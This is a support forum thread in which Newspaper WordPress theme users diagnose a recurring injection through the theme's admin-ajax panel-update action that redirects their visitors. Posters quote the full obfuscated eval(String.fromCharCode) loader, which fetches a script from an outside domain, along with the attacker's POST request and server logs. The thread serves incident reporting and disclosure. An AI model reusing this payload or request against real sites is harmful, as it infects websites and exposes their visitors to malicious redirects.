JS/Kryptik.co trojan found in Composer plugin

Posted in: Newspaper
Post count: 4

This is going to sound crazy, but that’s what I am experiencing.

My Desktop antimalware is reporting JS/Kryptik.co when I load my site. I ran Cpanel’s Imunify and sure enough, it identified the infected files. I cleaned them. I still have that trojan reported by my Desktop antimalware.

I figured it could be hiding in one of the plugins. I disabled them all. The trojan was gone. Then I started enabling them one by one. It showed up when I enabled tagDiv Composer.

Neither Wordfence nor Imunify could find any infected files. Yet the trojan was still reported by my Desktop antimalware. I then removed all the tagDiv Newspaper theme plugins entirely and proceeded to re-install them. I checked in File Manager that they were really gone from the server before re-installing. They were re-installed and what do you know, the virus came back.

I figured this can’t be. We cannot have a trojan in the files that come from the theme provider’s source directly. So I figured this bastard hid somewhere inside WordPress core files. If none of the host’s antivirus solutions nor Wordfence can find it, then I am stuck.

I decided to just WIPE the whole site. I made a backup of the Uploads directory and a DB dump. I wiped the site clean. Clean.

I reinstalled WordPress. No trojan was loading.

I then imported the DB. Fine.

I then installed Newspaper by uploading a fresh new installable ZIP from Themeforrest via Add New Theme.

I enable the theme’s plugins.

And what do you know? The virus is back.

I then proceeded to test with a default 2022 Theme by WordPress. I activated that and deactivated the Newspaper. Poof, the virus was gone. I activate Newspaper back, and boom, the virus came back. On a fresh install of everything it only pops up when the Newspaper theme is active.

I even wiped the cache on my browser. It didn’t do the trick. I tried in both Chrome and Firefox. The trojan is still loading.

But if I change the freshly installed theme with a WP default theme it’s gone.

What the heck? Anyone?

Post count: 21065

Hello!

I’ll add this to our investigation list so we can look into it as well.Can you please let us know which app you use to find the malware?

Thank you!

Post count: 6

I am noticing exactly the same problem. I am not able to tell if it is a Trojan but I am getting redirection to some gambling and gaming sites. Siteground flagged it and asked me to take down my site into maintenance mode.

On checking, I found that When I remove the Newspaper theme, it works fine. And I am getting a flag with the TagDiv Composer Plugin. My tech team asked me to deactivate that plugin. So now I am just sitting with a barren website with a simple Neve theme and don’t know what to do: http://www.healthsachet.com

Obviously, I have tried reinstalling backups right up to 19th Aug 2022. No luck. Same issue everywhere. I am almost sure there was no infection in Sept-Oct on my machine. There was an attempt by a bot to register on my site for a few days in the first week of November. So I think the infection came after that. But why would it persist if I remove everything and put the 19th August data, including the plugins present at that time?

Post count: 13

Hi,
I have the same error of MadhurKotharay

Please @MadhurKotharay check in Newspaper > Theme Panel > Custom Code > Custom Javascript and check if there is a javascript with many numbers…
I delete this and now work correctly.
That problem is, that the hacker every 2/3 hours put another time the code…

Regards

Post count: 113

Same error here, when you enter to website it sends to some publicity page the first time yo enter in. Rarely if you come back to the site it works. I was testing with 3 plugins I updated yesterday but it still happening. Then I come here and see this issue so I think i´m in the same box that this partners of theme xd

And yes @breakeven the code is there!! Are you saying that if we delete it, 3 hours later we´re going to see there again? WTF? So who is doing this shit? Any way to block them.

Come on! give us a solution theme supporters

  • This reply was modified 3 years by loslunes.
  • This reply was modified 3 years by loslunes.
Post count: 4

as @breakeven said:
check in Newspaper > Theme Panel > Custom Code > Custom Javascript and check if there is a javascript with many numbers…
I delete this and now work correctly.

I had it in there too!

So, when I wiped the whole site and put back the same DB dump, the thing was stored in DB and was just reused with a fresh install of the theme.

It looked like the Composer plugin was the issue, because when it was activated, it pulled that custom Javascript.

Would be cool if tagDIV could think about how to prevent this type of stuff. Maybe they could work with Wordfence on it or add their own solutions so a code obviously injected like this could be spotted.

  • This reply was modified 3 years by virtualab.
Post count: 113

I solved it deleting the code and cleaning caches (until doing this second part the redirection to the ads was still happening). I have newspapper in version 11.5.1, I haven´t updated since then (I wait a little to see problems with new version but this time I forgot to update cause I was busy). Which version do you have? (maybe we have old versions or its happening with the new one too)

Post count: 8

I had the same problem, the solution is as @breakeven said:
check in Newspaper > Theme Panel > Custom Code > Custom Javascript and check if there is a javascript with many numbers…
How to prevent it from happening again, is the security problem is in the theme, wordpress or something else???

Post count: 21065

Hello!

We will investigate this problem. Until then, you need to protect, maintain your website and make a full backup. Follow this guide to clean your WordPress and theme of malware:
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ or https://askwpgirl.com/10-steps-remove-malware-wordpress-site/
Also, you can install an antivirus on your computer, scan it, and I think it can be found and deleted.

Thank you!

Post count: 9

We’re experiencing this same issue across multiple Newspaper websites. Somehow an unauthorized user is able to upload a plugin through admin-ajax.php and inject the redirect script to: Theme Panel -> Custom Code -> Custom Javascript

it’s being posted to tagdiv custom javascript through action=td_ajax_update_panel.

It seems that this is a widespread issue on Newspaper and needs an urgent patch!

The script that’s being injected is:

eval(String.fromCharCode(118,97,114,32,112,115,100,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,100,100,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,32,61,61,32,34,115,108,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,101,99,116,114,101,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,48,44,49,48,49,44,49,49,57,44,49,49,53,44,52,54,44,49,49,57,44,49,48,49,44,57,55,44,49,49,54,44,49,48,52,44,49,48,49,44,49,49,52,44,49,49,50,44,49,48,56,44,49,48,56,44,49,48,56,44,57,55,44,49,49,54,44,49,48,50,44,49,49,49,44,49,49,52,44,49,48,57,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,57,57,44,49,49,49,44,49,49,55,44,49,49,48,44,49,49,54,44,49,48,49,44,49,49,52,44,49,49,53,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,52,57,44,52,54,44,53,48,44,53,49,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));

Post count: 9

TagDiv Support. Please see my other comment. Also, this is how the hackers are injecting the script.

135.125.178.115 – – [11/Nov/2022:20:26:49 +0000] “POST /wp-admin/admin-ajax.php HTTP/1.0” 200 1 “https://site-url-removed.com/wp-admin/admin-ajax.php” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0” 0.000 1.588 1.588 200 1.588 action=td_ajax_update_panel&td_magic_token=c8ae20cbbe&td_option%5Btds_custom_javascript%5D=eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C112%2C115%2C100%2C100%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C115%2C99%2C114%2C105%2C112%2C116%2C34%2C41%2C59%2C32%2C118%2C97%2C114%2C32%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C32%2C61%2C32%2C102%2C97%2C108%2C115%2C101%2C59%2C102%2C111%2C114%2C32%2C40%2C118%2C97%2C114%2C32%2C105%2C32%2C61%2C32%2C48%2C59%2C32%2C105%2C32%2C60%2C32%2C112%2C115%2C100%2C100%2C46%2C108%2C101%2C110%2C103%2C116%2C104%2C59%2C32%2C105%2C43%2C43%2C41%2C32%2C123%2C32%2C32%2C32%2C105%2C102%2C32%2C40%2C112%2C115%2C100%2C100%2C91%2C105%2C93%2C46%2C105%2C100%2C41%2C32%2C123%2C32%2C32%2C32%2C9%2C32%2C105%2C102%2C32%2C40%2C112%2C115%2C100%2C100%2C91%2C105%2C93%2C46%2C105%2C100%2C32%2C61%2C61%2C32%2C34%2C115%2C108%2C101%2C99%2C116%2C114%2C101%2C112%2C111%2C105%2C110%2C116%2C34%2C41%2C123%2C32%2C9%2C9%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C61%2C116%2C114%2C117%2C101%2C59%2C32%2C9%2C32%2C125%2C32%2C32%2C32%2C125%2C32%2C32%2C125%2C105%2C102%2C40%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C61%2C61%2C102%2C97%2C108%2C115%2C101%2C41%2C123%2C32%2C9%2C118%2C97%2C114%2C32%2C100%2C61%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C59%2C118%2C97%2C114%2C32%2C115%2C61%2C100%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C115%2C46%2C105%2C100%2C61%2C34%2C115%2C108%2C101%2C99%2C116%2C114%2C101%2C112%2C111%2C105%2C110%2C116%2C34%2C59%2C115%2C46%2C115%2C114%2C99%2C61%2C83%2C116%2C114%2C105%2C110%2C103%2C46%2C102%2C114%2C111%2C109%2C67%2C104%2C97%2C114%2C67%2C111%2C100%2C101%2C40%2C49%2C48%2C52%2C44%2C49%2C49%2C54%2C44%2C49%2C49%2C54%2C44%2C49%2C49%2C50%2C44%2C49%2C49%2C53%2C44%2C53%2C56%2C44%2C52%2C55%2C44%2C52%2C55%2C44%2C49%2C49%2C48%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C57%2C44%2C49%2C49%2C53%2C44%2C52%2C54%2C44%2C49%2C49%2C57%2C44%2C49%2C48%2C49%2C44%2C57%2C55%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C52%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C49%2C50%2C44%2C49%2C48%2C56%2C44%2C49%2C48%2C56%2C44%2C49%2C48%2C56%2C44%2C57%2C55%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C50%2C44%2C49%2C49%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C48%2C57%2C44%2C52%2C54%2C44%2C57%2C57%2C44%2C49%2C49%2C49%2C44%2C49%2C48%2C57%2C44%2C52%2C55%2C44%2C57%2C57%2C44%2C49%2C49%2C49%2C44%2C49%2C49%2C55%2C44%2C49%2C49%2C48%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C49%2C53%2C44%2C52%2C54%2C44%2C49%2C48%2C54%2C44%2C49%2C49%2C53%2C44%2C54%2C51%2C44%2C49%2C49%2C56%2C44%2C54%2C49%2C44%2C52%2C57%2C44%2C52%2C57%2C44%2C52%2C54%2C44%2C53%2C48%2C44%2C53%2C49%2C41%2C59%2C32%2C105%2C102%2C32%2C40%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C41%2C32%2C123%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C46%2C112%2C97%2C114%2C101%2C110%2C116%2C78%2C111%2C100%2C101%2C46%2C105%2C110%2C115%2C101%2C114%2C116%2C66%2C101%2C102%2C111%2C114%2C101%2C40%2C115%2C44%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C41%2C59%2C125%2C32%2C101%2C108%2C115%2C101%2C32%2C123%2C100%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C39%2C104%2C101%2C97%2C100%2C39%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C115%2C41%2C59%2C125%2C32%2C125%29%29%3B

Post count: 113

@walshcreative which version of Newspaper installed? Just wanted to know if the problem is with all version because I have said before we have 11.5.1 (because I don’t remember to update) and was affected to until our partner @breakeven give the solution. Anyway, is a great vulnerability that they have to solve asap.

  • This reply was modified 3 years by loslunes.
Post count: 113

Ey the code appears again tonight! I was seeing every 3-4 hours and I see it again un custom javascript.

PLEASE GIVE US A SOLUTION!!!

I´m not so pro as our partner but I´m seeing a strange behaviour with this ip but not found any code as the one copied before.

  • This reply was modified 3 years by loslunes.
Post count: 113

IP: 91.134.227.26
I have looked at the log of my site searching for any code like =eval or charcode but see nothing, but the custom css was there AGAIN!!!

  • This reply was modified 3 years by loslunes.
Post count: 113

AND NOW ALSO IN CUSTOM HTML!!! See atached image: https://ibb.co/Qbs0Xjn

SOLVE IT!!!!

Post count: 9

11.4.3 and 11.5

Post count: 35449

Hi loslunes,
Does that code appear every few hours? If so, maybe someone or something set it there, or maybe you have an object cache. if you have a full backup for the site, and you want us to investigate this problem, for this please contact us by email at contact@tagdiv.com and check our cPanel and wp-admin access.
Thank you!

Post count: 113

I deleted it on Monday when someone here talks about this code in your theme custom JavaScript and clean all the caches. The problem was solved.

Yesterday, I looked more than 10 times firing the day until its appears again in my last view at 11:40 pm. I look into the log and saw a strange behaviour in the ip I said calling to admin ajax two times after asking for home page and then this ip leave.

Its someone who called to and action related to the theme like our partner shows above. So it seems to be a vulnerability of the composer.

I have version 11.5.1 so maybe I have to update and see of coming back… I will let you know and if the problem persists we will talk again about you to look into our panel.

Post count: 113

Look at the log from yesterday:

91.134.227.26 – – [15/Nov/2022:22:04:51 +0100] “GET / HTTP/1.1” 200 170375 “-” “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36”
91.134.227.26 – – [15/Nov/2022:22:04:53 +0100] “POST /wp-admin/admin-ajax.php HTTP/1.1” 200 77 “https://www.mysite.com/wp-admin/admin-ajax.php” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
91.134.227.26 – – [15/Nov/2022:22:04:55 +0100] “GET /wp-admin/admin.php?page=td_theme_panel HTTP/1.1” 200 118509 “https://www.mysite.com/wp-admin/admin.php?page=td_theme_panel” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
91.134.227.26 – – [15/Nov/2022:22:05:00 +0100] “POST /wp-admin/admin-ajax.php HTTP/1.1” 200 21 “https://www.mysite.com/wp-admin/admin-ajax.php” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”

The only one asking for https://www.mysite.com/wp-admin/admin.php?page=td_theme_panel is me and this ip. After this ip asked for this resources the code appears again

Post count: 9

The code is being injected. It’s a security flaw in the theme and needs a patch. This is a widespread issue on Newspaper.

Post count: 9

Clearing the caches won’t help. We can clearly see on our server logs that it is repeatedly added to the site. The issue is not because it is cached.

Post count: 113

I’m looking the custom codes option every 30 min xD. This is insane. Anyway, I’m waiting the server to make a backup and a relaxing moment in my website (It’s happening when our visit has increased 300% from 5 months ago… so it’s a big problem having malware injected that random way) to update to last version and see if the problem persists.

Anyway, they should make a deep investigation about the issue and stop telling us its “our problem”

  • This reply was modified 3 years by loslunes.
Post count: 69

Hey yall, same issue here, been plaguing me for a week before I hunted it down and found it in the custom javascript window. Just by chance decided to check the forum here to see if anyone else had the issue. Exact same code injected into the javascript window that was mentioned above by @walshcreative

deleting the code from the window “fixes” it, but not sure if it will reappear.
None of my code audting platforms were able to detect it. (wordfence or mysites.guru)

running 11.5.1 on wordpress 6.1

Post count: 69

Were you able to locate it in the DB?

Post count: 9

Can we get some actual support on this? It’s a critical security issue on all sites currently running the Newspaper theme and likely impacting your +100,000 customers. There is nothing in the Changelog for the latest version that shows this was addressed so upgrading the theme would not fix it.

Viewing 25 posts - 1 through 25 (of 40 total)
The forum ‘Newspaper’ is closed to new topics and replies.